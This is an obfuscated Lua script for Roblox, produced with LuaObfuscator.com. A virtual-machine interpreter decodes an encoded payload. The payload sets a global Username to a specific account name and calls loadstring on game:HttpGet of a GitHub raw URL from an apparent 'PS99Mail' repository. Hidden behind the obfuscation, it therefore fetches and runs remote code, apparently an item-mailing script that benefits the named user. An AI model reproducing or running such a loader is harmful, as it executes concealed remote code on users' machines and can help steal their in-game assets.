--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v71=0;while true do if (v71==0) then v19=v0(v3(v30,1,1));return "";end end else local v72=0;local v73;while true do if (v72==0) then v73=v2(v0(v30,16));if v19 then local v102=0;local v103;while true do if (v102==1) then return v103;end if (v102==0) then v103=v5(v73,v19);v19=nil;v102=1;end end else return v73;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v74=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -(878 -(282 + 595))))) + (620 -(555 + 64)))) ;return v74-(v74%(932 -(857 + 74))) ;else local v75=(2205 -(1523 + 114)) -(367 + 201) ;local v76;while true do if (v75==(927 -(214 + 713))) then v76=2^(v32-(1 + 0)) ;return (((v31%(v76 + v76))>=v76) and (1 + 0)) or 0 ;end end end end local function v21()local v34=0;local v35;while true do if (v34==((1271 -(226 + 1044)) + 0)) then return v35;end if (v34==(0 -(0 -0))) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1;end end end local function v22()local v36=117 -(32 + 85) ;local v37;local v38;while true do if (v36==(1 -0)) then return (v38 * (251 + 5)) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (3 -(181 -(67 + 113))) ;v36=958 -(892 + 65) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v42 * 16777216) + (v41 * (48199 + 17337)) + (v40 * (1017 -761)) + v39 ;end local function v24()local v43=952 -(802 + 150) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 -0)) then v46=(2352 -(1789 + 124)) -(145 + (1059 -(745 + 21))) ;v47=(v20(v45,2 -1 ,36 -(43 -27) ) * ((2 + 0)^(1029 -(915 + 82)))) + v44 ;v43=5 -3 ;end if (v43==(2 + 0)) then v48=v20(v45,27 -6 ,1169 -(116 + 1022) );v49=((v20(v45,1219 -(368 + 701 + 118) )==(2 -1)) and  -(1 -0)) or (1 + 0) ;v43=(3381 -2519) -(814 + 45) ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==(794 -(4 + 364 + 423))) then if (v48==(0 + 0 + 0)) then if (v47==(0 -(1055 -(87 + 968)))) then return v49 * ((79 -61) -(10 + 8)) ;else local v104=(0 + 0) -0 ;while true do if (v104==0) then v48=1;v46=1080 -((2305 -1285) + 60) ;break;end end end elseif (v48==(3470 -(630 + 793))) then return ((v47==(0 -0)) and (v49 * ((3 -2)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(1465 -((1829 -(447 + 966)) + 26)) ) * (v46 + (v47/((6 -4)^(23 + 29)))) ;end end end local function v25(v50)local v51;if  not v50 then local v77=0 -0 ;while true do if (((2976 -1159) -(1703 + (350 -236)))==v77) then v50=v23();if (v50==(701 -(108 + 268 + 325))) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;local v52={};for v69=1, #v51 do v52[v69]=v2(v1(v3(v51,v69,v69)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(2 -1)) then v56=nil;v57=nil;v53=1553 -(1126 + 425) ;end if (v53==(50 -(25 + 23))) then local v78=0 + 0 ;while true do if (v78==(406 -(118 + 287))) then v53=11 -8 ;break;end if (v78==(1121 -(118 + 1003))) then v58=nil;v59=nil;v78=2 -1 ;end end end if (v53~=(380 -(142 + 235))) then else v60=nil;v61=nil;v53=7 -3 ;end if ((101 -(11 + 86))==v53) then while true do if (v54==(9 -7)) then v59=nil;v60=nil;v54=1 + 2 ;end if (v54==1) then local v99=977 -(553 + 424) ;local v100;while true do if ((0 -0)==v99) then v100=0 + 0 ;while true do if (v100~=(2 -1)) then else v54=9 -7 ;break;end if (v100==0) then local v113=0 + 0 ;while true do if (v113==0) then v57=nil;v58=nil;v113=2 -1 ;end if ((1 + 0)==v113) then v100=1 + 0 ;break;end end end end break;end end end if (v54~=(3 + 0)) then else v61=nil;while true do local v105=0;local v106;while true do if (v105==(1061 -(810 + 251))) then v106=0;while true do if (v106==(1 + 0)) then if (v55==(1 + 2)) then local v115=0 -0 ;local v116;while true do if ((0 -0)==v115) then v116=0 + 0 ;while true do if (v116~=0) then else local v169=0;while true do if (v169==(0 -0)) then for v183=534 -(43 + 490) ,v23() do v57[v183-(734 -(711 + 22)) ]=v28();end return v59;end end end end break;end end end if (v55==(0 + 0)) then local v117=859 -(240 + 619) ;local v118;local v119;while true do if (v117==(4 -3)) then while true do if ((753 -(239 + 514))~=v118) then else v119=0 + 0 ;while true do if (v119==(1329 -(797 + 532))) then v56={};v57={};v119=1 + 0 ;end if (v119~=1) then else v58={};v55=1 + 0 ;break;end end break;end end break;end if (v117~=0) then else v118=0 -0 ;v119=nil;v117=1203 -(373 + 829) ;end end end break;end if (v106==0) then local v114=0 + 0 ;while true do if ((0 -0)==v114) then if (v55==(733 -(476 + 255))) then local v139=0 -0 ;local v140;while true do if (v139==(1739 -(404 + 1335))) then v140=406 -(183 + 223) ;while true do if (v140==(1131 -(369 + 761))) then for v185=1,v23() do local v186=0;local v187;while true do if ((0 + 0)==v186) then v187=v21();if (v20(v187,1 -0 ,1 -0 )~=(0 + 0)) then else local v189=238 -(64 + 174) ;local v190;local v191;local v192;local v193;local v194;local v195;while true do if ((0 + 0)==v189) then v190=0 -0 ;v191=nil;v189=337 -(144 + 192) ;end if ((338 -(10 + 327))==v189) then v192=nil;v193=nil;v189=2;end if (v189==(218 -(42 + 174))) then v194=nil;v195=nil;v189=3 + 0 ;end if (v189~=(3 + 0)) then else while true do if (v190==0) then local v203=0 + 0 ;while true do if (v203~=0) then else v191=1504 -(363 + 1141) ;v192=nil;v203=1581 -(1183 + 397) ;end if (v203==(2 -1)) then v190=1 + 0 ;break;end end end if (v190==1) then local v204=0 -0 ;while true do if (v204==(1494 -(711 + 782))) then v190=3 -1 ;break;end if (v204==(469 -(270 + 199))) then v193=nil;v194=nil;v204=1 + 0 ;end end end if (v190==(2 + 0)) then v195=nil;while true do if (v191==(5 -3)) then while true do if (v192~=(1976 -(1913 + 62))) then else local v210=0 + 0 ;local v211;while true do if (v210~=(0 -0)) then else v211=0;while true do if (v211~=(1 + 0)) then else v192=2;break;end if (v211==(0 + 0)) then local v221=1933 -(565 + 1368) ;while true do if (v221~=(3 -2)) then else v211=1662 -(1477 + 184) ;break;end if (v221==(0 -0)) then v195={v22(),v22(),nil,nil};if (v193==0) then local v225=0;local v226;local v227;local v228;while true do if (v225~=(0 -0)) then else v226=0;v227=nil;v225=2 -1 ;end if (v225==(4 -3)) then v228=nil;while true do if (v226==(305 -(244 + 60))) then while true do if (v227==(0 + 0)) then v228=476 -(41 + 435) ;while true do if (v228~=(1001 -(938 + 63))) then else v195[3 + 0 ]=v22();v195[9 -5 ]=v22();break;end end break;end end break;end if (v226==(1125 -(936 + 189))) then local v236=0 + 0 ;while true do if (v236~=0) then else v227=0 -0 ;v228=nil;v236=1614 -(1565 + 48) ;end if (v236~=(506 -(351 + 154))) then else v226=1 + 0 ;break;end end end end break;end end elseif (v193==(1575 -(1281 + 293))) then v195[269 -(28 + 238) ]=v23();elseif (v193==(1140 -(782 + 356))) then v195[3]=v23() -((269 -(176 + 91))^16) ;elseif (v193==(1562 -(1381 + 178))) then local v237=0;local v238;while true do if ((0 -0)==v237) then v238=0;while true do if (v238~=0) then else v195[4 -1 ]=v23() -((1094 -(975 + 117))^(1891 -(157 + 1718))) ;v195[2 + 2 ]=v22();break;end end break;end end end v221=3 -2 ;end end end end break;end end end if (v192==(3 + 0)) then if (v20(v194,2 + 1 ,473 -(381 + 89) )==(1 + 0)) then v195[3 + 1 ]=v61[v195[4]];end v56[v185]=v195;break;end if (v192==(0 -0)) then local v213=0;local v214;while true do if (v213==(0 -0)) then v214=0 -0 ;while true do if (v214==(1018 -(697 + 321))) then local v222=0;local v223;while true do if (v222~=(1784 -(214 + 1570))) then else v223=1455 -(990 + 465) ;while true do if (v223==(2 -1)) then v214=1 -0 ;break;end if (v223~=(0 -0)) then else local v233=0 + 0 ;while true do if (v233==0) then v193=v20(v187,3 -1 ,7 -4 );v194=v20(v187,1231 -(322 + 905) ,6);v233=612 -(602 + 9) ;end if (v233==(1190 -(449 + 740))) then v223=873 -(826 + 46) ;break;end end end end break;end end end if (v214~=1) then else v192=1;break;end end break;end end end if (v192~=(7 -5)) then else local v215=0;local v216;while true do if (v215==(947 -(245 + 702))) then v216=0 -0 ;while true do if ((0 + 0)~=v216) then else local v224=0;while true do if (v224~=(1898 -(260 + 1638))) then else if (v20(v194,1,441 -(382 + 58) )~=1) then else v195[6 -4 ]=v61[v195[2 + 0 ]];end if (v20(v194,3 -1 ,5 -3 )==(3 -2)) then v195[1208 -(902 + 303) ]=v61[v195[5 -2 ]];end v224=1;end if (v224==1) then v216=1 + 0 ;break;end end end if (v216==(2 -1)) then v192=1997 -(109 + 1885) ;break;end end break;end end end end break;end if (v191==(1470 -(1269 + 200))) then local v205=0 + 0 ;while true do if (v205==(1690 -(1121 + 569))) then v194=nil;v195=nil;v205=1;end if (v205==(215 -(22 + 192))) then v191=817 -(98 + 717) ;break;end end end if (v191==(683 -(483 + 200))) then local v206=0;while true do if (v206~=1) then else v191=1 -0 ;break;end if ((1463 -(1404 + 59))~=v206) then else local v217=0 -0 ;while true do if (v217==(0 -0)) then v192=0 + 0 ;v193=nil;v217=766 -(468 + 297) ;end if (v217~=(563 -(334 + 228))) then else v206=3 -2 ;break;end end end end end end break;end end break;end end end break;end end end v55=1 + 2 ;break;end if (v140==(0 -0)) then local v181=0 -0 ;while true do if (v181~=(0 + 0)) then else local v188=0 -0 ;while true do if (v188==0) then for v197=1 + 0 ,v60 do local v198=0 + 0 ;local v199;local v200;local v201;local v202;while true do if (v198==0) then v199=0;v200=nil;v198=237 -(141 + 95) ;end if (2==v198) then while true do if (v199==0) then v200=0 + 0 ;v201=nil;v199=2 -1 ;end if (v199==(2 -1)) then v202=nil;while true do if (v200==(1 + 0)) then if (v201==(2 -1)) then v202=v21()~=(0 + 0) ;elseif (v201==(1435 -(797 + 636))) then v202=v24();elseif (v201~=(14 -11)) then else v202=v25();end v61[v197]=v202;break;end if (v200==(0 + 0)) then local v208=0 + 0 ;local v209;while true do if (v208~=(0 -0)) then else v209=0 -0 ;while true do if (v209==0) then local v220=0 + 0 ;while true do if (0~=v220) then else v201=v21();v202=nil;v220=1 + 0 ;end if (v220==(164 -(92 + 71))) then v209=327 -(192 + 134) ;break;end end end if (v209==1) then v200=1 + 0 ;break;end end break;end end end end break;end end break;end if (v198~=1) then else v201=nil;v202=nil;v198=2 -0 ;end end end v59[3]=v21();v188=1 + 0 ;end if (1==v188) then v181=1 + 0 ;break;end end end if (v181==(766 -(574 + 191))) then v140=3 -2 ;break;end end end end break;end end end if (v55==(1 + 0)) then local v141=0 -0 ;local v142;while true do if (v141~=(0 + 0)) then else v142=849 -(254 + 595) ;while true do if (v142==(126 -(55 + 71))) then local v182=0 -0 ;while true do if (v182~=(1790 -(573 + 1217))) then else v59={v56,v57,nil,v58};v60=v23();v182=1;end if (v182==(326 -(45 + 280))) then v142=2 -1 ;break;end end end if (v142~=(1 + 0)) then else v61={};v55=2;break;end end break;end end end v114=1;end if (v114~=1) then else v106=1 -0 ;break;end end end end break;end end end break;end if (v54~=0) then else local v101=939 -(714 + 225) ;while true do if (v101~=(0 -0)) then else v55=0 + 0 ;v56=nil;v101=1;end if (v101~=(1 -0)) then else v54=1 + 0 ;break;end end end end break;end if (v53~=0) then else local v79=0 -0 ;while true do if (v79==0) then v54=0 -0 ;v55=nil;v79=807 -(118 + 688) ;end if (v79==1) then v53=1912 -(340 + 1571) ;break;end end end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v83=v66;local v84=v67;local v85=v68;local v86=v27;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v98=0;while true do if (1==v98) then if (v96<=9) then if (v96<=4) then if (v96<=1) then if (v96==0) then if ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v64;else v93[v95[2]]=v64[v95[3]];end else v93[v95[2]]=v95[3];end elseif (v96<=2) then local v122=v95[2];local v123,v124=v86(v93[v122](v13(v93,v122 + 1 ,v95[3])));v88=(v124 + v122) -1 ;local v125=0;for v136=v122,v88 do v125=v125 + 1 ;v93[v136]=v123[v125];end elseif (v96==3) then v93[v95[2]]();elseif (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96<=6) then if (v96==5) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end else v93[v95[2]]=v95[3];end elseif (v96<=7) then do return;end elseif (v96>8) then v64[v95[3]]=v93[v95[2]];else local v149=0;local v150;local v151;while true do if (v149==1) then v93[v150 + 1 ]=v151;v93[v150]=v151[v95[4]];break;end if (v149==0) then v150=v95[2];v151=v93[v95[3]];v149=1;end end end elseif (v96<=14) then if (v96<=11) then if (v96>10) then local v128=0;local v129;local v130;while true do if (v128==1) then v93[v129 + 1 ]=v130;v93[v129]=v130[v95[4]];break;end if (v128==0) then v129=v95[2];v130=v93[v95[3]];v128=1;end end else v93[v95[2]]();end elseif (v96<=12) then local v131=v95[2];v93[v131]=v93[v131](v13(v93,v131 + 1 ,v88));elseif (v96>13) then v87=v95[3];else local v153=0;local v154;local v155;local v156;local v157;while true do if (v153==1) then v88=(v156 + v154) -1 ;v157=0;v153=2;end if (v153==0) then v154=v95[2];v155,v156=v86(v93[v154](v13(v93,v154 + 1 ,v95[3])));v153=1;end if (v153==2) then for v178=v154,v88 do v157=v157 + 1 ;v93[v178]=v155[v157];end break;end end end elseif (v96<=16) then if (v96>15) then if ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v64;else v93[v95[2]]=v64[v95[3]];end else v64[v95[3]]=v93[v95[2]];end elseif (v96<=17) then v87=v95[3];elseif (v96==18) then local v161=0;local v162;while true do if (v161==0) then v162=v95[2];v93[v162]=v93[v162](v13(v93,v162 + 1 ,v88));break;end end else do return;end end v87=v87 + 1 ;break;end if (v98==0) then v95=v83[v87];v96=v95[1];v98=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030A3O0064616E69642O6F6E2O69030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O0012063O00013O0026043O0001000100010004113O00010001001206000100033O00120F000100023O001210000100043O001210000200053O00200B000200020006001206000400074O0002000200044O001200013O00022O00030001000100010004113O000E00010004113O000100012O00133O00017O00",v9(),...);
